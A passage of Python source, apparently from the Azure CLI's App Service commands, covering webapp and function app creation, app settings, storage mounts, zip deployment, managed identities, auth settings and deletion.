plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = client.check_name_availability(name, 'Site')
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
app_metadata = client.web_apps.list_metadata(resource_group_name, name)
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group_name, name, kind="app", properties=app_metadata.properties)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except DefaultErrorResponseException as ex:
if ex.response.status_code != 200:
raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
